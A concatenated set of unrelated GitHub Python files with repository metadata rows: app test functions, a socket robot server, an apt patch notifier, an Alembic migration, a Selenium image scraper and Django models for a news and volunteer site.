"years_att": "2020"
}
]
}
fake_user = {"username": "alexm", "password": "Alex123!",
"first_name": "Alex", "last_name": "Miller"}
fake_friend = {"username": "ayman", "password": "Ayman123!",
"first_name": "Ayman", "last_name": "Nagi"}
assert verify_register(fake_user["username"], fake_user["password"],
fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
display_user(fake_user["username"])
friend_option()
options = get_user_option(1,2)
if options == 1:
print("No friends listed")
if options == 2:
assert options == 2
def test_friend_list():
with open("test_database.json", 'w+') as db:
init_db = {
"users": []
}
json.dump(init_db, db)
db.close()
fake_user = {"username": "alexm", "password": "Alex123!",
"first_name": "Alex", "last_name": "Miller"}
assert verify_register(fake_user["username"], fake_user["password"],
fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
str = ""
print("You have already connected with:")
with open('test_database.json') as db:
data = json.load(db)
for user in data["users"]:
if user["username"] == LOGGED_IN_USER["username"]:
str = LOGGED_IN_USER["username"]
print('\n'.join(user["friends"]), )
yes_no = prompt("Would you like to disconnect from any of your friends?(y/n): ")
if yes_no:
deleted_friend = input("Enter the name of the friend you want to delete from the list above: ")
if deleted_friend in user["friends"]:
user["friends"].remove(deleted_friend)
print(deleted_friend, "was deleted")
with open('test_database.json', 'w+') as db:
json.dump(data, db)
for user in data["users"]:
if user["username"] == deleted_friend:
user["friends"].remove(str)
with open('test_database.json', 'w+') as db:
json.dump(data, db)
else:
print("The username you entered is not part of your friends.")
else:
break
def test_friend_search():
username = input("Please enter a username (type in 'alexm' for test): ")
password = input("Please enter a password (type in 'Alexm123!' for test) : ")
logged_in = login(username, password)
friend = str(
input("Search for people you know by last name, university, or thier major (type in last name 'Nagi' for test case): "))
people_found = []
found_friend = False
# Search db for friend by last name, university, or major
with open("database.json", 'r') as db:
data = json.load(db)
for user in data["users"]:
if user["username"] == LOGGED_IN_USER["username"]:
continue
if user["last_name"] == friend:
people_found.append(user["username"])
found_friend = True
db.close()
if found_friend:
i = 1
print("We found " + str(len(people_found)) +
" person(s) that matched your search. Please select your friend:")
print("0. Exit")
# Print all people with matching results
for name in people_found:
print(str(i) + ". " + str(name))
i += 1
# Let user select friend to add and make pending request for friend
selection = get_user_option(0, len(people_found))
if selection == 0: # If they select exit
return False
else: # If selected a person to add
selection -= 1
request_friend(people_found[selection], LOGGED_IN_USER["username"])
print("You have successfully sent " +
str(people_found[selection]) + " a friend request.")
return True
else:
print("Sorry we couldn't find your friend")
return False
def test_del_job():
with open("test_database.json", 'w+') as db:
init_db = {
"users": []
}
json.dump(init_db, db)
data = json.load(db)
db.close()
fake_user = {"username": "alexm", "password": "Alex123!",
"first_name": "Alex", "last_name": "Miller"}
assert verify_register(fake_user["username"], fake_user["password"],
fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
logged_in = login("alexm", "Alexm123!")
while True:
time.sleep(1)
print_manage_jobs()
user_choice = get_user_option(1, 5)
while user_choice < 1 or user_choice > 5:
print("Invalid input. Try again")
user_choice = get_user_option(1, 5)
if user_choice == 1: # Delete a job
deleted = delete_job()
assert deleted == True
return True
elif user_choice == 2: # View saved jobs
edit_saved = edit_saved_jobs()
assert edit_saved == True
return True
elif user_choice == 3: # View applied jobs
printApplied = print_applied_jobs()
assert printApplied == True
return True
elif user_choice == 4: # View jobs not applied for
notApplied = print_not_applied()
assert notApplied == True
return True
else:
break
| [
"noreply@github.com"
] | noreply@github.com |
10e6c2473d46f0395d61ceb53a829bd201bce125 | 53e59b27ddde86802e4c9ecca49e6aa9bd456c6c | /robot_server.py | 9a55f78053f7b3abafb854a53b59395fe7ce6671 | [] | no_license | kumarisurbhi/SIH_Hardware_2019 | 3e6c5f245dd4ffe26967f1c031922a69f06acbb4 | 9da13e60d1b08a269fe8ccef40821641efc46f84 | refs/heads/master | 2022-07-11T13:14:38.551897 | 2020-05-17T06:23:02 | 2020-05-17T06:23:02 | 196,074,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,158 | py | import socket
host = ''
port = 5560 # any higher level port
storedValue = "Yo, what's up?"
def setupServer():
# socket.AF_* - address and protocol families
# socket.SOCK_* - socket type
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('socket created')
try:
s.bind((host,port))
except socket.error as msg:
print(msg)
print('socket bind complete')
return s
def setupConnection():
s.listen (1) # allows 1 conection at a time,
#for more than one change here and use multithreading
conn, address = s.accept()
print('connected to : ' + address[0]+ ':' + str(address[1]))
return conn
# ****** Commands in form of functions ******
def GET():
reply = storedValue
return reply
def REPEAT(dataMessage):
reply = dataMessage[1]
return reply
# ****** end of commands ******
def dataTransfer(conn):
print('started dataTransfer')
# a big loop that sends and recieve data until told not to
while True:
print('in loop')
# Recieve data
data = conn.recv(1024) # recieve data with specified buffer size ie 1024 here
# in python3 data needs to be encoded while sending and decoded while recieving,
# here we plan to send and recieve strings so we ue utf-8
data = data.decode('utf-8')
# now we split data by space, 1 time
# data is in format "comand info"
# so we seperate comand and info part
dataMessage = data.split(' ', 1)
command = dataMessage[0]
reply = ''
# foto command function
if command == 'GET':
reply = GET()
elif command == 'R':
reply = REPEAT(dataMessage)
# to pervent crash when client disconects
elif command =='EXIT':
print('client left')
break
# to shut down our server
elif command == 'KILL':
print('server is shutting down')
s.close()
break
else:
reply = 'Unknown command'
# send reply back to the client
print (reply)
conn.send(str.encode(str(reply)))
print('data has been sent')
conn.close()
s = setupServer()
while True:
try:
conn = setupConnection()
print('dataTransfer')
dataTransfer(conn)
print('after dataTransfer')
except:
print('exception mai aa gaya')
break # to prevent crash and exit if failed
raise e
| [
"itsmesurbhi27@gmail.com"
] | itsmesurbhi27@gmail.com |
5a41960a55928dd63bb70c8a7008554e17a3496e | fa04e703556632fb6f513181070a496294b4f0dd | /patchnotifyer.py | e9804345e8e3f1936beb087a831e11a4efd27754 | [] | no_license | mhagander/patchnotifyer | a377d741c3837cbe6e5c8026ceced9a0a4b4c056 | 14c9b1d14780460645807227176db01aeef18267 | refs/heads/master | 2021-01-11T15:01:35.217795 | 2017-01-31T10:03:56 | 2017-01-31T10:03:56 | 80,282,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,583 | py | #!/usr/bin/env python3
import argparse
from io import StringIO
import socket
import smtplib
from email.mime.text import MIMEText
import apt_pkg
class _DevNullProgress(object):
# Need this class to make the apt output not go to the console
def update(self, percent = None):
pass
def done(self, item = None):
pass
def stop(self):
pass
def pulse(self, owner = None):
pass
def update_status(self, a, b, c, d):
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Patch status notifyer")
parser.add_argument('--fromaddr', type=str, help='From email address')
parser.add_argument('--toaddr', type=str, help='To email address')
parser.add_argument('--subject', type=str, help='Subject', default="Patch status on {0}".format(socket.gethostname()))
parser.add_argument('--ignorepkg', type=str, nargs='+', default='Ignore packages by exact name')
args = parser.parse_args()
if args.fromaddr and not args.toaddr:
parser.error("Can't specify from without to")
if args.toaddr and not args.fromaddr:
parser.error("Can't specify to without from")
status = StringIO()
apt_pkg.init()
# Turn off cache to avoid concurrency issues
apt_pkg.config.set("Dir::Cache::pkgcache","")
# "apt-get update"
sl = apt_pkg.SourceList()
sl.read_main_list()
tmpcache = apt_pkg.Cache(_DevNullProgress())
tmpcache.update(_DevNullProgress(), sl)
# Now do the actual check
cache = apt_pkg.Cache(_DevNullProgress())
depcache = apt_pkg.DepCache(cache)
depcache.read_pinfile()
depcache.init()
if depcache.broken_count > 0:
status.write("Depcache broken count is {0}\n\n".format(depcache.broken_count))
depcache.upgrade(True)
if depcache.del_count > 0:
status.write("Dist-upgrade generated {0} pending package removals!\n\n".format(depcache.del_count))
for pkg in cache.packages:
if depcache.marked_install(pkg) or depcache.marked_upgrade(pkg):
if pkg.name in args.ignorepkg:
continue
status.write("Package {0} requires an update\n".format(pkg.name))
if status.tell() > 0:
if args.fromaddr:
# Send email!
msg = MIMEText(status.getvalue())
msg['Subject'] = args.subject
msg['From'] = args.fromaddr
msg['To'] = args.toaddr
s = smtplib.SMTP('localhost')
s.send_message(msg)
s.quit()
else:
print(status.getvalue())
| [
"magnus@hagander.net"
] | magnus@hagander.net |
71aeaf9ace671939684b2e376836428e91321100 | a72f501a945317646dfb3b1a049195994e63d69e | /migrations/versions/035ebdabfbca_.py | 413ed9f036cf63cbe5e3f1391a63e34ff0c54001 | [] | no_license | sseungyong/flask_pybo | bf49e11f3e5a70af751bf4a503476ccd6b2ba165 | fbdd37bccb1eea1c53938ff14a4ef757540f426e | refs/heads/master | 2023-01-01T21:51:52.998891 | 2020-10-13T17:07:17 | 2020-10-13T17:07:17 | 299,335,976 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | """empty message
Revision ID: 035ebdabfbca
Revises: e2002a5ab9f7
Create Date: 2020-10-02 00:49:20.198940
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '035ebdabfbca'
down_revision = 'e2002a5ab9f7'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('answer', schema=None) as batch_op:
batch_op.add_column(sa.Column('user_id', sa.Integer(), server_default='1', nullable=True))
batch_op.create_foreign_key(batch_op.f('fk_answer_user_id_user'), 'user', ['user_id'], ['id'], ondelete='CASCADE')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('answer', schema=None) as batch_op:
batch_op.drop_constraint(batch_op.f('fk_answer_user_id_user'), type_='foreignkey')
batch_op.drop_column('user_id')
# ### end Alembic commands ###
| [
"sseungyong@gmail.com"
] | sseungyong@gmail.com |
b210ba738591526df3bf05544638139ece6c18ee | 73e52b0411cb95aa1592aa3e1f9d86691d6e913c | /scraper.py | 63a5c1a3914afb5e553b2c90db57ce7587e958cc | [] | no_license | PandeKalyani95/Image-Scraper- | cae43e3b4057b9041bf67344a4cdcbd0029f61aa | 7bef3ad3ce5a153d70dade4f082d84d412c1db38 | refs/heads/master | 2023-01-15T23:25:38.271057 | 2020-11-26T11:11:20 | 2020-11-26T11:11:20 | 316,202,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,513 | py | import os
import time
import requests
from selenium import webdriver
def fetch_image_urls(query: str, max_links_to_fetch: int, wd: webdriver, sleep_between_interactions: int = 1):
def scroll_to_end(wd):
wd.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(sleep_between_interactions)
# build the google query
search_url = "https://www.google.com/search?safe=off&site=&tbm=isch&source=hp&q={q}&oq={q}&gs_l=img"
# https://www.google.com/search?safe=off&site=&tbm=isch&source=hp&q=dog&oq=dog&gs_l=img
# load the page
wd.get(search_url.format(q=query))
image_urls = set()
image_count = 0
results_start = 0
while image_count < max_links_to_fetch:
scroll_to_end(wd)
# get all image thumbnail results
thumbnail_results = wd.find_elements_by_css_selector("img.Q4LuWd")
number_results = len(thumbnail_results)
print(f"Found: {number_results} search results. Extracting links from {results_start}:{number_results}")
for img in thumbnail_results[results_start:number_results]:
# try to click every thumbnail such that we can get the real image behind it
try:
img.click()
time.sleep(sleep_between_interactions)
except Exception:
continue
# extract image urls
actual_images = wd.find_elements_by_css_selector('img.n3VNCb')
for actual_image in actual_images:
if actual_image.get_attribute('src') and 'http' in actual_image.get_attribute('src'):
image_urls.add(actual_image.get_attribute('src'))
image_count = len(image_urls)
if len(image_urls) >= max_links_to_fetch:
print(f"Found: {len(image_urls)} image links, done!")
break
else:
print("Found:", len(image_urls), "image links, looking for more ...")
time.sleep(30)
return
load_more_button = wd.find_element_by_css_selector(".mye4qd")
if load_more_button:
wd.execute_script("document.querySelector('.mye4qd').click();")
# move the result startpoint further down
results_start = len(thumbnail_results)
return image_urls
def persist_image(folder_path:str,url:str, counter):
try:
image_content = requests.get(url).content
except Exception as e:
print(f"ERROR - Could not download {url} - {e}")
try:
f = open(os.path.join(folder_path, 'jpg' + "_" + str(counter) + ".jpg"), 'wb')
f.write(image_content)
f.close()
print(f"SUCCESS - saved {url} - as {folder_path}")
except Exception as e:
print(f"ERROR - Could not save {url} - {e}")
def search_and_download(search_term: str, driver_path: str, target_path='./images', number_images=10):
target_folder = os.path.join(target_path, '_'.join(search_term.lower().split(' ')))
# os automatically choose the Oprating system wheather it is windows/linux/ubantu
if not os.path.exists(target_folder):
os.makedirs(target_folder)
with webdriver.Chrome(executable_path=driver_path) as wd:
res = fetch_image_urls(search_term, number_images, wd=wd, sleep_between_interactions=0.5)
counter = 0
for elem in res:
persist_image(target_folder, elem, counter)
counter += 1
# pip install -r requirements.txt
# My chrome Version 85.0.4183.102
# My Firefox Version 80.0.1 (64-bit)
# How to execute this code
# Step 1 : pip install selenium, pillow, requests
# Step 2 : make sure you have chrome/Mozilla installed on your machine
# Step 3 : Check your chrome version ( go to three dot then help then about google chrome )
# Step 4 : Download the same chrome driver from here " https://chromedriver.storage.googleapis.com/index.html "
# select the forlder which is closer to your crome version
# for windows download 'cromedrive-win32' click on it once it downloaded it then
# Step 5 : put it inside the same folder of this code
# Crome-Version:- Version 86.0.4240.183 (Official Build) (64-bit)
DRIVER_PATH = './chromedriver.exe' # this file for windows
search_term = 'minions' # type any thing that you want to download
# num of images you can pass it from here by default it's 10 if you are not passing
number_images = 5 # no. of images
search_and_download(search_term=search_term, driver_path=DRIVER_PATH, number_images = number_images) | [
"kalyanipande95@gmail.com"
] | kalyanipande95@gmail.com |
df88d230cbd15ec04bc1a6a72a97e0b4d0682ea6 | b7427b344463aa1f53b15d19d70612ba48fd127d | /ThE_HustleR_ThinG/hustlerApp/models.py | 193937979c8f05469ab292421ca04393624e45ed | [] | no_license | faisal-git/ThE-HustleR-ProjecT | a778b186f6e09f1e85c35046380d74e786530eb8 | 6dae2d602d0f2606c64206cb17bdea748d7c9146 | refs/heads/main | 2023-02-21T15:43:41.909611 | 2021-01-28T06:47:30 | 2021-01-28T06:47:30 | 333,650,126 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,445 | py | from django.db import models
from django.contrib.auth.models import User
class userProfile(models.Model):
user=models.OneToOneField(User,null=True,on_delete=models.CASCADE)
FirstName=models.CharField(max_length=50)
LastName=models.CharField(max_length=50,null=True,blank=True)
Age=models.IntegerField(blank=True,null=True)
PurposeOfLife=models.CharField(max_length=100,blank=True,null=True)
Hobbies=models.CharField(max_length=50,blank=True,null=True)
class volunteerProfile(models.Model):
volunteer=models.OneToOneField(User,null=True,on_delete=models.CASCADE)
FirstName=models.CharField(max_length=50)
LastName=models.CharField(max_length=50,blank=True,null=True)
Image=models.ImageField(default='volunteer.png',upload_to='volunteer_pics')
Date_created=models.DateField(auto_now_add=True)
Introduction=models.CharField(max_length=200,blank=True,null=True)
Profession=models.CharField(max_length=50,blank=True,null=True)
Experience=models.CharField(max_length=30,blank=True,null=True)
PurposeOfLife=models.CharField(max_length=100,blank=True,null=True)
Hobbies=models.CharField(max_length=50,blank=True,null=True)
Phone:models.CharField(max_length=15)
HideContactDetail=models.BooleanField(default=True)
class newsReport(models.Model):
tag_choice=(
('academics','academics'),
('sports','sports'),
('entertainment','entertainment'),
('carrier','carrier'),
('business','business'),
('other','other'),
)
Title=models.CharField(verbose_name='title here',max_length=200)
Image=models.ImageField(default='good-news.jpg',upload_to='news_pics')
Date_created=models.DateField(auto_now_add=True)
Description=models.TextField(max_length=1000)
Place=models.CharField(max_length=100)
Tag=models.CharField(max_length=50,choices=tag_choice)
Status=models.BooleanField(default=False)
Views=models.IntegerField(default=0)
class newsLikes(models.Model):
news=models.ForeignKey(newsReport,on_delete=models.CASCADE)
users=models.ForeignKey(User,on_delete=models.CASCADE)
class newsViews(models.Model):
news=models.ForeignKey(newsReport,on_delete=models.CASCADE)
users=models.ForeignKey(User,on_delete=models.CASCADE)
class newsDisLikes(models.Model):
news=models.ForeignKey(newsReport,on_delete=models.CASCADE)
users=models.ForeignKey(User,on_delete=models.CASCADE)
| [
"faisalkv1963@gmail.com"
] | faisalkv1963@gmail.com |
8a751dd3fdd8f7cad0fb5420727098f2afbf427a | db3177a2130e32f5d77cdba0fcfa68d51aefe465 | /Grade_Calculator/grade_calculatorV2.py | 2cf6fa0adc2adaa74b31f623cde46c2d3bb04a93 | [] | no_license | David-Papworth/python-examples | 9880d4792a11c6a43e241e2f445bf28bac0aeaa7 | 09687a9aec186f982d846880142431eb184ec0bb | refs/heads/master | 2023-04-12T10:23:15.335305 | 2021-05-05T16:19:57 | 2021-05-05T16:19:57 | 360,544,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | def grade():
maths = int(input('Enter your maths mark: '))
chemistry = int(input('Enter your chemistry mark: '))
physics = int(input('Enter your physics mark: '))
total_mark = maths + chemistry + physics
average_mark = total_mark / 3
if average_mark >= 70:
achieve = "You achieved a grade: A"
elif average_mark >= 60:
achieve = "You achieved a grade: B"
elif average_mark >= 50:
achieve = "You achieved a grade: C"
elif average_mark >= 40:
achieve = "You achieved a grade: D"
else:
achieve = "You have failed"
return f"{achieve}"
print(grade()) | [
"dpapworth@academytrainee.com"
] | dpapworth@academytrainee.com |
fe54ef4a2f8f30cf3007c63d2da81d1941a2a673 | 2b8724d84d09f6fd92dc758e3bff7c38e5630ff6 | /puzzle6.py | 26a79673e3f5745c0566a2d6f3960394bcf127cc | [
"BSD-3-Clause"
] | permissive | apaku/aoc2017 | c8605d0dc299dfe6263c0e708537035c5b24e205 | 03c7fa468d571c02cd7f577e309de5fb39d97092 | refs/heads/master | 2021-03-24T12:01:32.240124 | 2017-12-28T10:59:04 | 2017-12-28T10:59:04 | 113,380,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | import sys
def part1(numbers):
blocks = list(numbers)
seenConfigurations = []
iterationcnt = 1
while True:
nextSplitIdx = blocks.index(max(blocks))
banksize = blocks[nextSplitIdx]
blocks[nextSplitIdx] = 0
nextBlock = nextSplitIdx + 1
while banksize > 0:
if nextBlock == len(blocks):
nextBlock = 0
blocks[nextBlock] += 1
banksize -= 1
nextBlock += 1
if blocks in seenConfigurations:
break
seenConfigurations.append(list(blocks))
iterationcnt += 1
return iterationcnt
def part2(numbers):
blocks = list(numbers)
seenConfigurations = {}
iterationcnt = 1
while True:
nextSplitIdx = blocks.index(max(blocks))
banksize = blocks[nextSplitIdx]
blocks[nextSplitIdx] = 0
nextBlock = nextSplitIdx + 1
while banksize > 0:
if nextBlock == len(blocks):
nextBlock = 0
blocks[nextBlock] += 1
banksize -= 1
nextBlock += 1
blockstr = ' '.join(map(str, blocks))
if blockstr in seenConfigurations:
return iterationcnt - seenConfigurations[blockstr]
break
seenConfigurations[blockstr] = iterationcnt
iterationcnt += 1
return None
if __name__ == "__main__":
data = [int(x) for x in sys.stdin.read().split('\t')]
print part1(data)
print part2(data)
| [
"andreas@froglogic.com"
] | andreas@froglogic.com |
41c2187a7bca2dee9abfa4754403ee086d30d9f3 | 9eb973d9c41708827579b7c4b5b0976fc420d7af | /src/command_modules/azure-cli-resource/azure/cli/command_modules/resource/commands.py | 7eba5e84a7887f1178ec54e3130eebcf7e298b12 | [] | no_license | affini-tech/azureCli | 6e8c2a8a280e11a6a4c9e4cae78eecca8109edcd | 5f0a699f78533723cc302a80d8b68a24f83cc969 | refs/heads/master | 2021-07-07T02:45:52.972867 | 2017-10-03T07:12:40 | 2017-10-03T07:12:40 | 105,291,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,802 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from collections import OrderedDict
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.core.commands import cli_command
from azure.cli.core.commands.arm import \
(cli_generic_update_command, cli_generic_wait_command, handle_long_running_operation_exception,
deployment_validate_table_format)
from azure.cli.core.util import empty_on_404
from azure.cli.command_modules.resource._client_factory import (_resource_client_factory,
cf_resource_groups,
cf_providers,
cf_features,
cf_tags,
cf_deployments,
cf_deployment_operations,
cf_policy_definitions,
cf_resource_links,
cf_resource_managedapplications,
cf_resource_managedappdefinitions)
# Resource group commands
def transform_resource_group_list(result):
return [OrderedDict([('Name', r['name']), ('Location', r['location']), ('Status', r['properties']['provisioningState'])]) for r in result]
cli_command(__name__, 'group delete', 'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.delete', cf_resource_groups, no_wait_param='raw', confirmation=True)
cli_generic_wait_command(__name__, 'group wait', 'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.get', cf_resource_groups)
cli_command(__name__, 'group show', 'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.get', cf_resource_groups, exception_handler=empty_on_404)
cli_command(__name__, 'group exists', 'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.check_existence', cf_resource_groups)
cli_command(__name__, 'group list', 'azure.cli.command_modules.resource.custom#list_resource_groups', table_transformer=transform_resource_group_list)
cli_command(__name__, 'group create', 'azure.cli.command_modules.resource.custom#create_resource_group')
cli_command(__name__, 'group export', 'azure.cli.command_modules.resource.custom#export_group_as_template')
# Resource commands
def transform_resource_list(result):
transformed = []
for r in result:
res = OrderedDict([('Name', r['name']), ('ResourceGroup', r['resourceGroup']), ('Location', r['location']), ('Type', r['type'])])
try:
res['Status'] = r['properties']['provisioningStatus']
except TypeError:
res['Status'] = ' '
transformed.append(res)
return transformed
cli_command(__name__, 'resource create', 'azure.cli.command_modules.resource.custom#create_resource')
cli_command(__name__, 'resource delete', 'azure.cli.command_modules.resource.custom#delete_resource')
cli_command(__name__, 'resource show', 'azure.cli.command_modules.resource.custom#show_resource', exception_handler=empty_on_404)
cli_command(__name__, 'resource list', 'azure.cli.command_modules.resource.custom#list_resources', table_transformer=transform_resource_list)
cli_command(__name__, 'resource tag', 'azure.cli.command_modules.resource.custom#tag_resource')
cli_command(__name__, 'resource move', 'azure.cli.command_modules.resource.custom#move_resource')
cli_command(__name__, 'resource invoke-action', 'azure.cli.command_modules.resource.custom#invoke_resource_action')
# Resource provider commands
cli_command(__name__, 'provider list', 'azure.mgmt.resource.resources.operations.providers_operations#ProvidersOperations.list', cf_providers)
cli_command(__name__, 'provider show', 'azure.mgmt.resource.resources.operations.providers_operations#ProvidersOperations.get', cf_providers, exception_handler=empty_on_404)
cli_command(__name__, 'provider register', 'azure.cli.command_modules.resource.custom#register_provider')
cli_command(__name__, 'provider unregister', 'azure.cli.command_modules.resource.custom#unregister_provider')
cli_command(__name__, 'provider operation list', 'azure.cli.command_modules.resource.custom#list_provider_operations')
cli_command(__name__, 'provider operation show', 'azure.cli.command_modules.resource.custom#show_provider_operations')
if supported_api_version(ResourceType.MGMT_RESOURCE_RESOURCES, min_api='2017-05-10'):
# Resource feature commands
cli_command(__name__, 'feature list', 'azure.cli.command_modules.resource.custom#list_features', cf_features)
cli_command(__name__, 'feature show', 'azure.mgmt.resource.features.operations.features_operations#FeaturesOperations.get', cf_features, exception_handler=empty_on_404)
cli_command(__name__, 'feature register', 'azure.mgmt.resource.features.operations.features_operations#FeaturesOperations.register', cf_features)
# Tag commands
cli_command(__name__, 'tag list', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.list', cf_tags)
cli_command(__name__, 'tag create', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.create_or_update', cf_tags)
cli_command(__name__, 'tag delete', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.delete', cf_tags)
cli_command(__name__, 'tag add-value', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.create_or_update_value', cf_tags)
cli_command(__name__, 'tag remove-value', 'azure.mgmt.resource.resources.operations.tags_operations#TagsOperations.delete_value', cf_tags)
# Resource group deployment commands
def transform_deployments_list(result):
sort_list = sorted(result, key=lambda deployment: deployment['properties']['timestamp'])
return [OrderedDict([('Name', r['name']), ('Timestamp', r['properties']['timestamp']), ('State', r['properties']['provisioningState'])]) for r in sort_list]
cli_command(__name__, 'group deployment create', 'azure.cli.command_modules.resource.custom#deploy_arm_template', no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception)
cli_generic_wait_command(__name__, 'group deployment wait', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.get', cf_deployments)
if supported_api_version(resource_type=ResourceType.MGMT_RESOURCE_RESOURCES, min_api='2017-05-10'):
cli_command(__name__, 'group deployment list', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.list_by_resource_group', cf_deployments, table_transformer=transform_deployments_list)
else:
cli_command(__name__, 'group deployment list', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.list', cf_deployments, table_transformer=transform_deployments_list)
cli_command(__name__, 'group deployment show', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.get', cf_deployments, exception_handler=empty_on_404)
cli_command(__name__, 'group deployment delete', 'azure.mgmt.resource.resources.operations.deployments_operations#DeploymentsOperations.delete', cf_deployments)
cli_command(__name__, 'group deployment validate', 'azure.cli.command_modules.resource.custom#validate_arm_template', table_transformer=deployment_validate_table_format)
cli_command(__name__, 'group deployment export', 'azure.cli.command_modules.resource.custom#export_deployment_as_template')
# Resource group deployment operations commands
cli_command(__name__, 'group deployment operation list', 'azure.mgmt.resource.resources.operations.deployment_operations#DeploymentOperations.list', cf_deployment_operations)
cli_command(__name__, 'group deployment operation show', 'azure.cli.command_modules.resource.custom#get_deployment_operations', cf_deployment_operations, exception_handler=empty_on_404)
cli_generic_update_command(__name__, 'resource update',
'azure.cli.command_modules.resource.custom#show_resource',
'azure.cli.command_modules.resource.custom#update_resource')
cli_generic_update_command(__name__, 'group update',
'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.get',
'azure.mgmt.resource.resources.operations.resource_groups_operations#ResourceGroupsOperations.create_or_update',
lambda: _resource_client_factory().resource_groups)
cli_command(__name__, 'policy assignment create', 'azure.cli.command_modules.resource.custom#create_policy_assignment')
cli_command(__name__, 'policy assignment delete', 'azure.cli.command_modules.resource.custom#delete_policy_assignment')
cli_command(__name__, 'policy assignment list', 'azure.cli.command_modules.resource.custom#list_policy_assignment')
cli_command(__name__, 'policy assignment show', 'azure.cli.command_modules.resource.custom#show_policy_assignment', exception_handler=empty_on_404)
cli_command(__name__, 'policy definition create', 'azure.cli.command_modules.resource.custom#create_policy_definition')
cli_command(__name__, 'policy definition delete', 'azure.mgmt.resource.policy.operations#PolicyDefinitionsOperations.delete', cf_policy_definitions)
cli_command(__name__, 'policy definition list', 'azure.mgmt.resource.policy.operations#PolicyDefinitionsOperations.list', cf_policy_definitions)
cli_command(__name__, 'policy definition show', 'azure.cli.command_modules.resource.custom#get_policy_definition', exception_handler=empty_on_404)
cli_command(__name__, 'policy definition update', 'azure.cli.command_modules.resource.custom#update_policy_definition')
cli_command(__name__, 'lock create', 'azure.cli.command_modules.resource.custom#create_lock')
cli_command(__name__, 'lock delete', 'azure.cli.command_modules.resource.custom#delete_lock')
cli_command(__name__, 'lock list', 'azure.cli.command_modules.resource.custom#list_locks')
cli_command(__name__, 'lock show', 'azure.cli.command_modules.resource.custom#get_lock', exception_handler=empty_on_404)
cli_command(__name__, 'lock update', 'azure.cli.command_modules.resource.custom#update_lock')
cli_command(__name__, 'resource link create', 'azure.cli.command_modules.resource.custom#create_resource_link')
cli_command(__name__, 'resource link delete', 'azure.mgmt.resource.links.operations#ResourceLinksOperations.delete', cf_resource_links)
cli_command(__name__, 'resource link show', 'azure.mgmt.resource.links.operations#ResourceLinksOperations.get', cf_resource_links, exception_handler=empty_on_404)
cli_command(__name__, 'resource link list', 'azure.cli.command_modules.resource.custom#list_resource_links')
cli_command(__name__, 'resource link update', 'azure.cli.command_modules.resource.custom#update_resource_link')
if supported_api_version(ResourceType.MGMT_RESOURCE_RESOURCES, min_api='2017-05-10'):
cli_command(__name__, 'managedapp create', 'azure.cli.command_modules.resource.custom#create_application')
cli_command(__name__, 'managedapp delete', 'azure.mgmt.resource.managedapplications.operations#ApplicationsOperations.delete', cf_resource_managedapplications)
cli_command(__name__, 'managedapp show', 'azure.cli.command_modules.resource.custom#show_application', exception_handler=empty_on_404)
cli_command(__name__, 'managedapp list', 'azure.cli.command_modules.resource.custom#list_applications')
cli_command(__name__, 'managedapp definition create', 'azure.cli.command_modules.resource.custom#create_applicationdefinition')
cli_command(__name__, 'managedapp definition delete', 'azure.mgmt.resource.managedapplications.operations#ApplicationDefinitionsOperations.delete', cf_resource_managedappdefinitions)
cli_command(__name__, 'managedapp definition show', 'azure.cli.command_modules.resource.custom#show_applicationdefinition')
cli_command(__name__, 'managedapp definition list', 'azure.mgmt.resource.managedapplications.operations#ApplicationDefinitionsOperations.list_by_resource_group', cf_resource_managedappdefinitions, exception_handler=empty_on_404)
| [
"lco@affini-tech.com"
] | lco@affini-tech.com |
87f83e0d8d9efa6a1b537f090b0033bac8c5c9f1 | 077d59b7619d10d47b2f9ecbc7050f04a3dba4f1 | /salaryhedge/salaryhedge/salaryhedge/wsgi.py | b834edaf1b94069f48274f7bb2523e4715f9e61a | [
"MIT"
] | permissive | focalpointgit/djangoReactDemo | 04bb383ac6569408bb7dbdcdf8cb1fe123ce16fb | 108cae09f1720179648c4e71192b62856ae6b5f0 | refs/heads/master | 2021-01-02T09:41:37.574732 | 2017-08-06T15:22:29 | 2017-08-06T15:22:29 | 99,280,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | """
WSGI config for salaryhedge project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
